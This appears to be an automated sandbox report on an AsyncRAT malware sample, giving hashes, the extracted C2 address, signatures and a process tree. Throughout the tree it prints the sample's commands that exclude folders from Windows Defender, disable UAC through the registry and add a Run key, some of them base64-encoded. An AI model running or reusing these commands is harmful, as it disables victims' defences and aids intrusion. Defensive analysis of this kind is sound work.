Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
10-11-2024 02:56
Static task
static1
Behavioral task
behavioral1
Sample
274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe
Resource
win7-20241010-en
General
-
Target
274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe
-
Size
1.9MB
-
MD5
73ce5f094321f2683b7846397b3d5a8c
-
SHA1
d17102bc9d37a5ff9506dfbf94d0608378fae2c6
-
SHA256
274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5
-
SHA512
20eac921ba5dbc25ac0b751c768540fb3d54b4b359ce638dd7168bf57e12c0450a1b42db0c90b59be49c84fad289ee5e7b5e3ac683d66664d0d5f1adccc89c8e
-
SSDEEP
24576:oDlxLeM+sLqZS62SiyY4TWKaJTXogjqpn5WMAw3FKvKvPoxBoOux5lUA4X+he6P2:K3Ci334noyvnbzJ8eF
Malware Config
Extracted
asyncrat
1.0.7
Default
isabelaflores.fun:7000
ServicesMutex_qwqdanchun
-
delay
240
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2756 powershell.exe 2176 powershell.exe 2792 powershell.exe 1192 powershell.exe 2424 powershell.exe 2532 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1704 Driver.exe -
Loads dropped DLL 3 IoCs
pid Process 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Documentos = "C:\\Users\\Public\\Documentos.exe" 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1704 set thread context of 2624 1704 Driver.exe 57 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Driver.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2532 powershell.exe 2756 powershell.exe 2188 powershell.exe 2424 powershell.exe 2792 powershell.exe 2176 powershell.exe 1192 powershell.exe 2864 powershell.exe 2008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2532 powershell.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1832 wrote to memory of 2564 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 30 PID 1832 wrote to memory of 2564 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 30 PID 1832 wrote to memory of 2564 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 30 PID 1832 wrote to memory of 2564 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 30 PID 1832 wrote to memory of 2584 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 31 PID 1832 wrote to memory of 2584 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 31 PID 1832 wrote to memory of 2584 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 31 PID 1832 wrote to memory of 2584 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 31 PID 1832 wrote to memory of 768 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 33 PID 1832 wrote to memory of 768 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 33 PID 1832 wrote to memory of 768 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 33 PID 1832 wrote to memory of 768 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 33 PID 1832 wrote to memory of 2348 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 34 PID 1832 wrote to memory of 2348 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 34 PID 1832 wrote to memory of 2348 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 34 PID 1832 wrote to memory of 2348 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 34 PID 1832 wrote to memory of 2620 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 37 PID 1832 wrote to memory of 2620 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 37 PID 1832 wrote to memory of 2620 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 37 PID 1832 wrote to memory of 2620 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 37 PID 1832 wrote to memory of 2984 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 38 PID 1832 wrote to memory of 2984 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 38 PID 1832 wrote to memory of 2984 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 38 PID 1832 wrote to memory of 2984 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 38 PID 1832 wrote to memory of 2836 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 40 PID 1832 wrote to memory of 2836 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 40 PID 1832 wrote to memory of 2836 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 40 PID 1832 wrote to memory of 2836 1832 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe 40 PID 2564 wrote to memory of 2424 2564 cmd.exe 44 PID 2564 wrote to memory of 2424 2564 cmd.exe 44 PID 2564 wrote to memory of 2424 2564 cmd.exe 44 PID 2564 wrote to memory of 2424 2564 cmd.exe 44 PID 2584 wrote to memory of 2532 2584 cmd.exe 45 PID 2584 wrote to memory of 2532 2584 cmd.exe 45 PID 2584 wrote to memory of 2532 2584 cmd.exe 45 PID 2584 wrote to memory of 2532 2584 cmd.exe 45 PID 2984 wrote to memory of 1192 2984 cmd.exe 46 PID 2984 wrote to memory of 1192 2984 cmd.exe 46 PID 2984 wrote to memory of 1192 2984 cmd.exe 46 PID 2984 wrote to memory of 1192 2984 cmd.exe 46 PID 768 wrote to memory of 2176 768 cmd.exe 47 PID 768 wrote to memory of 2176 768 cmd.exe 47 PID 768 wrote to memory of 2176 768 cmd.exe 47 PID 768 wrote to memory of 2176 768 cmd.exe 47 PID 2348 wrote to memory of 2756 2348 cmd.exe 48 PID 2348 wrote to memory of 2756 2348 cmd.exe 48 PID 2348 wrote to memory of 2756 2348 cmd.exe 48 PID 2348 wrote to memory of 2756 2348 cmd.exe 48 PID 2836 wrote to memory of 2188 2836 cmd.exe 49 PID 2836 wrote to memory of 2188 2836 cmd.exe 49 PID 2836 wrote to memory of 2188 2836 cmd.exe 49 PID 2836 wrote to memory of 2188 2836 cmd.exe 49 PID 2620 wrote to memory of 2792 2620 cmd.exe 50 PID 2620 wrote to memory of 2792 2620 cmd.exe 50 PID 2620 wrote to memory of 2792 2620 cmd.exe 50 PID 2620 wrote to memory of 2792 2620 cmd.exe 50 PID 2188 wrote to memory of 1704 2188 powershell.exe 51 PID 2188 wrote to memory of 1704 2188 powershell.exe 51 PID 2188 wrote to memory of 1704 2188 powershell.exe 51 PID 2188 wrote to memory of 1704 2188 powershell.exe 51 PID 1704 wrote to memory of 2864 1704 Driver.exe 52 PID 1704 wrote to memory of 2864 1704 Driver.exe 52 PID 1704 wrote to memory of 2864 1704 Driver.exe 52 PID 1704 wrote to memory of 2864 1704 Driver.exe 52 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe"C:\Users\Admin\AppData\Local\Temp\274e4c594cfadeda5b78076c2791ab57d35b6b9bab954c30a2053d17812e1aa5.exe"1⤵
- UAC bypass
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1832 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\Documents\OneDrive.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\Documents\OneDrive.exe3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\Videos\Driver.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\Videos\Driver.exe3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Public\Videos\Driver.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Public\Videos\Driver.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Public\Videos\Driver.exe"C:\Users\Public\Videos\Driver.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==5⤵
- System Location Discovery: System Language Discovery
PID:684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe5⤵
- System Location Discovery: System Language Discovery
PID:2624
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d2969677c682a3e8e3a97cd06e3b6e4b
SHA1aea47a599ff0e3e39417f526c675bc2d0f7521d7
SHA256bcf19178385213f691179eb549a01c686418371d7b07fcc0e504346318adad6c
SHA5124282bd8c8d05cddf2f4e9b240964fba160901b065b24d5b5e42684b2c693470f3daacba02aa0d8440ac0feb1876fd47f105f483edc15ca4ba0c365e3c89523f2
-
Filesize
1.5MB
MD53531deebbc73acd7bc58dd6a24459b5c
SHA1bf0c02c51fcaee0f83f217b86473d237ee5c245d
SHA256971b380874ca6996edcd60e18331170344aecef479efd254bf6e1ccaa90d997b
SHA5122e3f64f6fc63ff494af46ce1df9f61f66db54c6aad4c339beb46a2b80b31cc317a8e53231878bd2413e917f933e3e49c4c74cf00842fce24f1a4f8bf6c31d242